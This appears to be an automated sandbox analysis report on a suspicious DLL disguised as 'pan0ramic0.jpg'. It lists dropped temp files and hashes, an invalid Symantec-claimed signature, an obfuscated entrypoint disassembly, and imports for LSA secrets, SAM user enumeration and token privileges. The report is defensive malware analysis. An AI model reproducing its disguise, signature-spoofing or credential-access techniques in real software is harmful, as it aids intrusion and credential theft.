                                                                                                                                                                                                  SHA1:EFD9E7A83D1C6F752289F411AC925FF93A64C4B8
                                                                                                                                                                                                  SHA-256:D4B1AE3229BD3DD9FFAD7AB9D50215E84A17BF25C2BE1A9768858797318F0CE9
                                                                                                                                                                                                  SHA-512:7AC98F384E4ABAC39A8E0FE8269D5B145159189C76D8593BD6A6A438303497BDEEE21DA6F1A27B651AF57D90AEA2B631573CF95D09B013F19730F44B29F85FE4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: GIF89a.............,........@..L..;GIF89a.............,........@..L..;
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF05189DBE12592ADF.TMP
                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39657
                                                                                                                                                                                                  Entropy (8bit):0.5766333911794704
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:kBqoxKAuvScS+DdvmtL6/mRh46/mRhU6/mRht:kBqoxKAuqR+DdvmtL6/oh46/ohU6/oht
                                                                                                                                                                                                  MD5:240DA6F811DA8654C1AC4FD6DFBD63EB
                                                                                                                                                                                                  SHA1:FC117922931E4504B89A5C3B85C56B7047482088
                                                                                                                                                                                                  SHA-256:7F83891410C15D57221AAE999F6C13FE2CCD51BE1031C08F3C9889BE2DDF02CB
                                                                                                                                                                                                  SHA-512:90FD951C86BA97068C1F58B58254526282A55AD2F6C800993C29DE374745AB7CE5C0688721DB965CDB69772C01C0243545B13050C83E668CA581B28A867954F2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF15357C5499AE2212.TMP
                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):186182
                                                                                                                                                                                                  Entropy (8bit):3.132605404951967
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:uZ/2BfcYmu5kLTzGthZ/2Bfc/mu5kLTzGt:Hw
                                                                                                                                                                                                  MD5:E234BFBC90D1ED56A8791DFB919F64D7
                                                                                                                                                                                                  SHA1:5385212C6EF2BF93F444236B7405869720154D39
                                                                                                                                                                                                  SHA-256:C524795B92CA367716D863CFD46E3A7F2BB9E504F3347ABCED2071C5759BAE7C
                                                                                                                                                                                                  SHA-512:15201C045CDB0337D0D5110038A3B5A6350199B03354C63BE310DC7F5BA3E31A5162378D2E2B47191778D8B4F688DEEE7B05644352C8705D2488F0B06C4C9A46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF185BD4625D48C0EE.TMP
                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29989
                                                                                                                                                                                                  Entropy (8bit):0.3304156545473839
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwN9lwt9l2D/9l2b9lai:kBqoxKAuvScS+uoD+O3y
                                                                                                                                                                                                  MD5:45FF3FBDD825506B105B9052D5136E66
                                                                                                                                                                                                  SHA1:7301588BA848DE15E043B29224B6B859CB4244E9
                                                                                                                                                                                                  SHA-256:087E4464A942C1C12BBF799EF7FB58624B5EF0DFB21F6F2EBC226510D99CA986
                                                                                                                                                                                                  SHA-512:5E7B1D4560AD1C937FEAE80486004C3CF18C925EA71E00C17A2769A19DAEFE053D4F70F72BF314D380ED336778CA1B5397CFAC67694C559632D96784AE6AA903
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF67008EB6CF702BD1.TMP
                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13557
                                                                                                                                                                                                  Entropy (8bit):0.7771535661570477
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9loNZ9loN59lWNhkbytc9RibtgLQDtwA0:kBqoINiNcNhkn94gcpM
                                                                                                                                                                                                  MD5:728B7B668A11C79EBA2243A8F2D3DE77
                                                                                                                                                                                                  SHA1:27069FE311B3881AB7E021A26ADEFDFEE3FAC7F5
                                                                                                                                                                                                  SHA-256:CF26215BC6806A5A60632747609C50B9EF40F1FC2ACAC3CFB15DA36660627370
                                                                                                                                                                                                  SHA-512:AB9B24C9D5221C5F622A65D994381EAB60054DC751B56BAB02BDED6880A42FA679067A925C552D3B5B949F7F80A8CD9661AAD9A7699B58CDBFDBDBCEFBD40262
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S2XUFXWOCA7EOB4WPIL3.temp
                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                  Entropy (8bit):3.186910239298171
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:JghdicP7IOC9GrIoegAsASFGwBdicP7IOh683GrIoegAczGZBdicP7IOx9GrIoe/:JkP7A9S+gAJDEP7J3S+gAHBP7H9S+gAf
                                                                                                                                                                                                  MD5:2F9E36F91FA10FC7EA4387AD7B0E0A8A
                                                                                                                                                                                                  SHA1:9EFC2E5A42B20422A7A2304BEB271B8EBD7AEBEF
                                                                                                                                                                                                  SHA-256:6D99256D93DC8BA801D4CE41398B180015E2CEDB03FBFF24E746F15086A83459
                                                                                                                                                                                                  SHA-512:77182A33ABD322CD89AE897AD515FCC9D0D3DDDB1F9ABEF3E48E96C9F56A822523233DD609C80DD0F623FAD75711853AB38484718B6494F4AC3A8B34B6127E03
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ...................................FL..................F.@.. .....@.>....Tf.......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.u..PROGRA~1..t......L.>Q.u....E...............J.....B.2.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.6R................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J6R.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]....................C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                                  Entropy (8bit):6.668996398379423
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                  File name:pan0ramic0.jpg.dll
                                                                                                                                                                                                  File size:225648
                                                                                                                                                                                                  MD5:86b877eeaf0482b5e1439ed80a82fffb
                                                                                                                                                                                                  SHA1:26c46504c293311f0403bf699f2ddc6cacb63c5b
                                                                                                                                                                                                  SHA256:8baffba2ed672607e1535dcbfcc47a264e7b8941f63cf181814d7365e8627d05
                                                                                                                                                                                                  SHA512:668d14788dea6baa58997ee0ddc364c93d268091cc0f2b7e30a1d0b29c6389438c11d53b35d5ab40abe58efebbc92f5acdae92e0cba852cfbd970cecf0e53dd5
                                                                                                                                                                                                  SSDEEP:6144:zD8oRf4zevEkXAsWBlYu3J8FAhbOqhGipCN:n8oZ4CvEkQJxScOSGipo
                                                                                                                                                                                                  File Content Preview:MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L..................!.........L....................@..........................@......U ...............................D.....

                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                  Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Entrypoint:0x42cefc
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                  Import Hash:399658d2b8f7d22bc3143e49f6f9461c

                                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                  Signature Issuer:CN=VeriSign Class 3 Code Signing 2004 CA, OU=Terms of use at https://www.verisign.com/rpa (c)04, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                  • 10/30/2007 5:00:00 PM 11/24/2010 3:59:59 PM
                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                  • CN=Symantec Corporation, OU=Symantec Research Labs, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Symantec Corporation, L=Santa Monica, S=California, C=US
                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                  Thumbprint MD5:773A103A1953B292916AAA8D3382140B
                                                                                                                                                                                                  Thumbprint SHA-1:508E846523E1B131438B220694BE91793886508E
                                                                                                                                                                                                  Thumbprint SHA-256:F67DDA8679C10547D47FBC3BD71D98953D4F73FC60C50035E6F366E3DA6395C2
                                                                                                                                                                                                  Serial:758F5EE8263B6694719D8434EB998608

                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  sub esp, 38h
                                                                                                                                                                                                  push esi
                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                  call dword ptr [00436ABAh]
                                                                                                                                                                                                  mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                  push 0000000Ah
                                                                                                                                                                                                  call 00007FF8C4BAFC6Dh
                                                                                                                                                                                                  add esp, 04h
                                                                                                                                                                                                  lea edi, dword ptr [0043A9ACh]
                                                                                                                                                                                                  xor edi, 781C8E92h
                                                                                                                                                                                                  add edi, 01h
                                                                                                                                                                                                  sub edi, 539C0740h
                                                                                                                                                                                                  mov dword ptr [ebp-14h], edi
                                                                                                                                                                                                  push dword ptr [0043A9ACh]
                                                                                                                                                                                                  push dword ptr [0043A9ACh]
                                                                                                                                                                                                  push dword ptr [0043AA18h]
                                                                                                                                                                                                  push 0000002Ch
                                                                                                                                                                                                  call 00007FF8C4BA8F98h
                                                                                                                                                                                                  mov dword ptr [0043AA18h], eax
                                                                                                                                                                                                  lea ebx, dword ptr [0043A9ACh]
                                                                                                                                                                                                  mov dword ptr [ebp-24h], ebx
                                                                                                                                                                                                  push dword ptr [0043A9D0h]
                                                                                                                                                                                                  push dword ptr [0043A9D0h]
                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                  call 00007FF8C4BAEECCh
                                                                                                                                                                                                  lea eax, dword ptr [0043AA18h]
                                                                                                                                                                                                  mov dword ptr [0043AA18h], eax
                                                                                                                                                                                                  push 004394B4h
                                                                                                                                                                                                  call dword ptr [004367D2h]
                                                                                                                                                                                                  cmp eax, 00000000h
                                                                                                                                                                                                  jne 00007FF8C4BA4A5Ah
                                                                                                                                                                                                  mov dword ptr [0043A9ACh], eax
                                                                                                                                                                                                  push 00438D90h
                                                                                                                                                                                                  call dword ptr [00436F32h]
                                                                                                                                                                                                  mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                                  jmp 00007FF8C4BAA6A2h
                                                                                                                                                                                                  push edi
                                                                                                                                                                                                  add edi, dword ptr [0040C7ECh]
                                                                                                                                                                                                  add ebx, esi
                                                                                                                                                                                                  call 00007FF8C4BA9F6Bh
                                                                                                                                                                                                  push 0043A854h
                                                                                                                                                                                                  push 00439BC0h
                                                                                                                                                                                                  call dword ptr [00436F1Ah]
                                                                                                                                                                                                  mov esi, ebx

                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x344e80x1516.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x17bd80x230.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x35c000x1570.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x420000x1f78.reloc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x3660e0xbe8.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                  Sections

                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                  .rdata0x10000x1dace0x17000False0.637737771739data5.74232733107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .text0x1f0000x227010x1bc00False0.561655405405data6.61812284912IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .reloc0x420000x1f780x2000False0.8056640625data6.80379139725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                  Imports

                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                  advapi32.dllLsaOpenSecret, QueryServiceConfigW, ConvertStringSidToSidW, DuplicateToken, LsaFreeMemory, RegSetValueExW, GetSecurityDescriptorDacl, AdjustTokenPrivileges, DuplicateTokenEx, WriteEncryptedFileRaw, CloseServiceHandle, OpenServiceW, InitializeAcl, GetSecurityDescriptorLength, GetSecurityDescriptorSacl, ControlService, RegisterEventSourceW, RegQueryInfoKeyW, SetEntriesInAclW, LookupAccountSidW, CopySid, ReportEventW, MakeSelfRelativeSD, RegReplaceKeyW, OpenThreadToken, InitializeSecurityDescriptor, LsaQuerySecret, GetSecurityDescriptorControl, LookupPrivilegeValueW, LsaQueryInformationPolicy, GetAce, RegCloseKey, RegRestoreKeyW, InitializeSid, RegSaveKeyExW, FreeSid, SystemFunction031, SetThreadToken, LookupAccountNameW, GetSecurityDescriptorGroup, RegOpenKeyExA, GetUserNameW, RegLoadKeyW, GetSidLengthRequired, RegSaveKeyW, CheckTokenMembership, GetLengthSid, DeregisterEventSource, RegQueryValueExA, ReadEncryptedFileRaw, RegEnumKeyExW, QueryServiceStatus, RegOpenKeyW, OpenProcessToken, RegConnectRegistryW, SetNamedSecurityInfoW, RegUnLoadKeyW, RegQueryValueExW, AddAce, LsaSetSecret, GetAclInformation, RegDeleteValueW, SetServiceStatus, OpenSCManagerW, SystemFunction027, CloseEncryptedFileRaw, ConvertSidToStringSidW, GetSidSubAuthority, SetFileSecurityW, RegFlushKey, IsValidSid, SetSecurityInfo, RegCreateKeyExW, RegNotifyChangeKeyValue, AccessCheck, LsaOpenPolicy, GetNamedSecurityInfoW, SystemFunction036, StartServiceA, RegisterServiceCtrlHandlerW, StartServiceW, OpenEncryptedFileRawW, LsaClose, MakeAbsoluteSD, GetSecurityDescriptorOwner, SystemFunction007, SetSecurityDescriptorDacl, EqualSid, GetTokenInformation, RegOpenKeyExW, RegEnumValueW, AllocateAndInitializeSid, RegDeleteKeyW, GetFileSecurityW
                                                                                                                                                                                                  avicap32.dllcapGetDriverDescriptionW
                                                                                                                                                                                                  comctl32.dllInitCommonControlsEx, ImageList_Create, ImageList_LoadImageW, ImageList_GetIcon, ImageList_GetImageCount, ImageList_Destroy, DestroyPropertySheetPage, ImageList_AddMasked, ImageList_GetImageInfo, ImageList_ReplaceIcon, CreatePropertySheetPageW, ImageList_Draw, CreateStatusWindowW, ImageList_DrawIndirect, _TrackMouseEvent
                                                                                                                                                                                                  comdlg32.dllGetOpenFileNameW, FindTextW, GetSaveFileNameW
                                                                                                                                                                                                  dbnmpntw.dllConnectionServerEnum
                                                                                                                                                                                                  docprop.dllDllGetClassObject
                                                                                                                                                                                                  gdi32.dllPatBlt, SetROP2, ExtTextOutW, CreateBitmapIndirect, DeleteObject, BitBlt, CreatePolygonRgn, IntersectClipRect, GetObjectType, CreateCompatibleBitmap, GetBkColor, SetBkMode, Polygon, SetBrushOrgEx, GetCurrentObject, CreateDIBSection, StretchBlt, CreateBitmap, SelectObject, CreateCompatibleDC, CreateSolidBrush, GetTextExtentExPointW, CreateRectRgnIndirect, GetClipRgn, MoveToEx, ExtCreatePen, SelectClipRgn, UnrealizeObject, Rectangle, GetTextMetricsW, RoundRect, GetObjectW, TextOutW, PtInRegion, GetPixel, GetDeviceCaps, CreatePatternBrush, SetTextColor, SetViewportOrgEx, DeleteDC, GetStockObject, CreateRectRgn, CombineRgn, CreateFontIndirectW, SetBkColor, SetPixel, CreatePen, GetTextExtentPoint32W, LineTo, SetTextAlign
                                                                                                                                                                                                  htui.dllHTUI_ColorAdjustmentW
                                                                                                                                                                                                  kbdlt.dllKbdLayerDescriptor
                                                                                                                                                                                                  kernel32.dllUnmapViewOfFile, GetLocaleInfoW, LoadLibraryA, GetLocalTime, TlsGetValue, TlsSetValue, CreateWaitableTimerW, CreateProcessW, GetFileTime, MoveFileExW, GetVolumePathNamesForVolumeNameW, DeleteCriticalSection, OpenEventW, TerminateProcess, GetThreadLocale, lstrcpyA, GetTimeFormatW, OutputDebugStringA, DeviceIoControl, lstrcpyW, GetTempPathW, GetCurrentThread, ResumeThread, GetTickCount, GetDriveTypeW, HeapFree, GetFileType, GetWindowsDirectoryW, GlobalAlloc, Sleep, DeleteFileW, GetACP, ReleaseMutex, lstrcpynA, FreeLibrary, WaitForMultipleObjectsEx, FatalAppExitW, FindResourceW, GetExitCodeThread, CreateDirectoryW, lstrcmpiA, SizeofResource, CreateFileW, GetComputerNameW, lstrcmpW, CreateMutexW, GetComputerNameExW, GetLogicalDriveStringsW, GetDateFormatW, GetSystemDirectoryW, GetProcAddress, VirtualAlloc, DuplicateHandle, RaiseException, GetProcessHeap, TlsAlloc, CopyFileW, SetLastError, SetEvent, GetLastError, GetFileInformationByHandle, HeapDestroy, GetUserDefaultLCID, LoadResource, IsProcessorFeaturePresent, SetWaitableTimer, WaitForSingleObjectEx, GetVersion, GlobalMemoryStatus, GetUserDefaultLangID, BackupRead, FindFirstFileW, GetVolumeInformationA, lstrcmpA, GetFullPathNameW, GetLongPathNameW, lstrcpynW, ReleaseSemaphore, GetModuleHandleExW, GetCurrentProcessId, lstrcmpiW, lstrlenA, ResetEvent, MultiByteToWideChar, GetVolumeInformationW, GetNumberFormatW, TerminateThread, IsDebuggerPresent, InterlockedDecrement, UnhandledExceptionFilter, GetModuleFileNameW, InterlockedIncrement, GlobalLock, GetModuleHandleW, LoadLibraryW, SetVolumeMountPointW, CreateThread, LocalAlloc, WaitForMultipleObjects, RemoveDirectoryW, GetFullPathNameA, GetSystemTime, GetCurrentDirectoryW, InterlockedExchange, FindResourceExW, QueryPerformanceCounter, GetLocaleInfoA, GetDiskFreeSpaceA, FileTimeToSystemTime, OpenMutexW, GetVersionExA, HeapAlloc, InitializeCriticalSection, SetThreadPriority, ExpandEnvironmentStringsW, FindVolumeClose, GetVersionExW, GetFileSize, GetDiskFreeSpaceExW, LockResource, ReadFile, SetFileAttributesW, GetCurrentProcess, GetModuleHandleA, lstrlenW, LoadLibraryExW, FindClose, SetFileShortNameW, VirtualProtectEx, GetComputerNameA, SetFilePointer, MulDiv, BackupWrite, ExpandEnvironmentStringsA, CreateSemaphoreW, FormatMessageW, FindFirstVolumeW, HeapSize, SetUnhandledExceptionFilter, WriteFile, TlsFree, DeleteVolumeMountPointW, HeapReAlloc, WaitForSingleObject, GlobalFree, GetSystemWindowsDirectoryW, lstrcatW, GetVolumeNameForVolumeMountPointW, CloseHandle, SetCurrentDirectoryW, VirtualFree, GetStartupInfoW, GetFileAttributesW, GetTempFileNameW, SystemTimeToTzSpecificLocalTime, LocalFree, FindNextVolumeW, FindNextFileW, GetCurrentThreadId, WideCharToMultiByte, EnterCriticalSection, GetSystemInfo, GetCommandLineW, MoveFileW, LeaveCriticalSection, InterlockedCompareExchange, CreateEventW, GlobalUnlock, RtlUnwind, FlushInstructionCache, SetFileTime
                                                                                                                                                                                                  loadperf.dllUpdatePerfNameFilesA
                                                                                                                                                                                                  msimg32.dllGradientFill, AlphaBlend
                                                                                                                                                                                                  msports.dllComDBClaimPort
                                                                                                                                                                                                  msvcrt.dll_callnewh, _wcsnicmp, ceil, strrchr, wcscat, _strdup, fwprintf, tolower, mbstowcs, isspace, _wcsicmp, _purecall, _vsnwprintf, swscanf, isxdigit, wcschr, _fpclass, sscanf, swprintf, atoi, memmove, setlocale, __CxxFrameHandler, _isnan, __dllonexit, strncmp, _onexit, _wfopen, strchr, _controlfp, _amsg_exit, getenv, wcsspn, modf, strstr, _XcptFilter, memset, _vsnprintf, ?terminate@@YAXXZ, isalnum, _ultoa, wcscpy, isalpha, toupper, isdigit, qsort, vsprintf, _wstrtime, fclose, _unlock, _lock, _stricmp, wcsncmp, _finite, memcpy, wcstoul, sprintf, _clearfp, wcsrchr, atof, wcsncpy, wcscmp, _wtol, _strnicmp, _wstrdate, _beginthreadex, malloc, _initterm, floor, _CxxThrowException, wcslen, free
                                                                                                                                                                                                  netapi32.dllNetbios, RxNetServerEnum, DsGetDcNameW, NetShareGetInfo, NetpIsRemote, I_NetServerSetServiceBitsEx, NetApiBufferAllocate, NetApiBufferFree, NetQueryDisplayInformation, NetAlertRaiseEx, NetUseDel
                                                                                                                                                                                                  ntdll.dllRtlFreeHeap, RtlSetEnvironmentVariable, RtlSetOwnerSecurityDescriptor, NtOpenEvent, RtlInitAnsiString, NtQuerySystemInformation, RtlTimeToSecondsSince1980, RtlInitUnicodeString, RtlCreateEnvironment, RtlNewSecurityObject, RtlReleaseResource, RtlInitString, RtlInitializeSid, RtlNtStatusToDosError, ZwQueryKey, ZwQueryValueKey, NtDeviceIoControlFile, ZwOpenKey, RtlAcquireResourceShared, NtQueryPerformanceCounter, RtlDeleteResource, RtlSubAuthorityCountSid, NtCancelIoFile, NtCancelTimer, RtlDestroyEnvironment, ZwClose, RtlCompareMemoryUlong, RtlAllocateHeap, NtQuerySystemTime, RtlUpcaseUnicodeStringToOemString, RtlCopyUnicodeString, RtlCreateAcl, RtlGetNtProductType, NtCreateFile, RtlDeleteSecurityObject, NtClose, NtSetTimer, RtlExpandEnvironmentStrings_U, RtlSetSaclSecurityDescriptor, RtlUpcaseUnicodeToOemN, NtCreateEvent, NtCreateTimer, RtlAppendUnicodeToString, RtlLengthRequiredSid, RtlCopySid, RtlCreateSecurityDescriptor, DbgBreakPoint, RtlCompareMemory, RtlInitializeResource, RtlAdjustPrivilege, RtlSetGroupSecurityDescriptor, NtOpenProcessToken, RtlUnicodeStringToAnsiString, RtlOemStringToUnicodeString, RtlAcquireResourceExclusive, RtlSubAuthoritySid, RtlAddAce, RtlEqualUnicodeString, NtOpenFile, RtlSetDaclSecurityDescriptor, RtlLengthSid, NtWaitForSingleObject, RtlEqualSid, ZwSetValueKey
                                                                                                                                                                                                  ole32.dllCLSIDFromProgID, CoMarshalInterThreadInterfaceInStream, StringFromGUID2, OleRun, GetConvertStg, CoInitializeSecurity, CreateStreamOnHGlobal, CoCreateInstance, CoRegisterClassObject, CoInitialize, StringFromCLSID, CoInitializeEx, CoRevokeClassObject, CoGetInterfaceAndReleaseStream, CLSIDFromString, ReleaseStgMedium, CoResumeClassObjects, CoUninitialize, CoTaskMemFree
                                                                                                                                                                                                  powrprof.dllGetPwrCapabilities
                                                                                                                                                                                                  rpcrt4.dllRpcBindingServerFromClient, RpcImpersonateClient, RpcServerRegisterIfEx, RpcStringBindingParseW, RpcServerUseProtseqEpW, RpcStringFreeW, RpcBindingFree, NdrServerCall2, RpcBindingToStringBindingW, RpcRevertToSelf, RpcServerUnregisterIf
                                                                                                                                                                                                  samlib.dllSamOpenDomain, SamOpenUser, SamLookupDomainInSamServer, SamEnumerateUsersInDomain, SamFreeMemory, SamSetInformationUser, SamCloseHandle, SamEnumerateDomainsInSamServer, SamConnect
                                                                                                                                                                                                  secur32.dllTranslateNameW, GetUserNameExW
                                                                                                                                                                                                  shell32.dllSHGetFolderPathW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, DragAcceptFiles, SHGetPathFromIDListW, SHGetDesktopFolder, SHBrowseForFolderW, SHAppBarMessage, SHGetSpecialFolderLocation, DragQueryFileW, SHGetFileInfoW, ShellExecuteW
                                                                                                                                                                                                  shlwapi.dllPathFindFileNameW, StrRStrIW, PathFindNextComponentW, SHDeleteValueW, PathStripPathW, StrStrIW, PathFileExistsW, SHDeleteKeyW, ColorAdjustLuma, PathRemoveFileSpecW, PathCombineW, PathAppendW, StrCpyNW, StrCmpIW, PathCompactPathW, StrRetToStrW, SHGetValueW, SHSetValueW, StrChrW, PathIsDirectoryW, PathCompactPathExW
